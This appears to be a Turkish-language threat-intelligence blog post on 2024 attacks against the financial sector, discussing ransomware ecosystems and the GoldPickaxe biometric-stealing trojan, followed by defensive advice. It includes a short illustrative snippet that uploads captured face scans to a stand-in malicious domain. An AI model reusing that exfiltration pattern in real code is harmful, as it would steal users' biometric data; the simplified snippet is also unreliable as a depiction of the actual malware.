Giriş:
Finans sektörü, sürekli olarak siber suçluların ve devlet destekli grupların hedefi haline gelmiştir. 2024 yılı, sıfır gün açıklarının, tedarik zinciri zayıflıklarının ve gelişmiş kötü amaçlı yazılımların istismar edildiği karmaşık saldırılara tanıklık etmiştir. Finansal kuruluşlar, dikkatlice planlanmış bu saldırılara karşı savunma mekanizmalarını güçlendirmek zorunda kalmıştır.
Teknik Açıklamalar:
Siber tehdit aktörleri, Initial Access Brokers (IAB) ve Ransomware-as-a-Service (RaaS) ekosistemleri gibi işbirlikçi modellere yönelerek erişimlerini ve etkilerini artırmaktadır. Bu aktörler, sistemlere giriş için zayıf noktaları hedef alırken, gelişmiş kötü amaçlı yazılımlar kullanarak saldırılarını gerçekleştirir. Örneğin, RansomHub gibi sorunlu yazılımlar, EDR sistemlerinden kaçınmak için özel kaçınma araçları içermektedir.
Son dönemde dikkat çeken aktörlerden biri olan GoldFactory, kullanıcıların biyometrik verilerini çalmak için geliştirilmiş GoldPickaxe Trojan’ını kullanmaktadır. Bu zararlı yazılım, özellikle Asya-Pasifik bölgesindeki iOS ve Android kullanıcılarını hedef almakta ve yüz tanıma özelliklerini suistimal etmektedir.
Örnekler:
GoldPickaxe Trojan’ının iOS sürümü, Apple TestFlight platformu üzerinden dağıtılmakta ve kullanıcıların yüz taramalarını yakalamakta kullanılmaktadır. Aşağıda, bu kötü amaçlı yazılımın biyometrik veri yakalama işlemi için basit bir mimari bulunmaktadır:
!
“`
func captureBiometricData() {
let faceScan = ARFaceTracking.getFacialMetrics()
C2Server.upload(data: faceScan, endpoint: “api.malicious-domain.com/face-auth”)
}
“`
Bu kod parçası, kullanıcıların yüz taramalarını yakalamak ve kötü niyetli bir sunucuya iletmek için kullanılan bir işlevi temsil etmektedir.
Önlemler & En İyi Uygulamalar:
Finansal kurumların, bilinen açıklarla ilgili yamaları hızla uygulaması ve Adversary-in-the-Middle (AiTM) phishing kitlerine karşı ek güvenlik önlemleri alması büyük önem taşımaktadır. Çok faktörlü kimlik doğrulama (MFA) çözümleri implement edilerek bu tehditlerin önüne geçilmelidir. Ayrıca, ağ segmentasyonu ve davranış analizi araçları kullanmak, beklenmeyen biyometrik veri transferlerini tespit etmede faydalı olabilir. Farklı sektörler arasında tehdit istihbaratının paylaşılması, gelişmiş saldırıların engellenmesi için kritik bir strateji oluşturacaktır.
Sonuç & Özet:
Siber tehdit aktörlerinin finans sektörüne yönelik saldırıları, teknik karmaşıklık ve psikolojik manipülasyon unsurlarını birleştirerek büyüyen bir tehlike arz etmektedir. Gelişmiş zararlı yazılımlar, açıklar ve yenilikçi saldırı yöntemleri, siber güvenlik savunmalarının sürekli olarak güncellenmesini gerektirmektedir. Güvenlik tedbirlerinin ön planda tutulması, bu tehlikelerle başa çıkmada etkili bir yol olacaktır.
Kaynakça:
– Cybersecurity News: [Cyber Threat Actors Leveraging Exploits To Attack Financial Sector With Advanced Malware](https://cybersecuritynews.com/threat-actors-attack-financial-sector-with-advanced-malware/)
– Sekoia: [Cyber Threats Impacting the Financial Sector](https://blog.sekoia.io/cyber-threats-impacting-the-financial-sector-in-2024-focus-on-the-main-actors/) https://i0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpwI6mHwCNcF43s35J9x5Rsd658QdK4G0fUAKBP0pAonWRO4YhrNo62H8u751CdeE3EuEw_Onn-H6paNToEWbFlYDQLYCB-z3JqKBCuTnlUXKkp0hTLKvRZzmqtwI9EbGhOopDMAhJqEjUhysIuWXfIX9gM5zto9X9x_OERs3ZTdKr6XMC861LF88r7ik/s16000/Cyber%20Threat%20Actors%20Leveraging%20Exploits%20To%20Attack%20Financial%20Sector%20With%20Advanced%20Malware.webpimage
About the Author
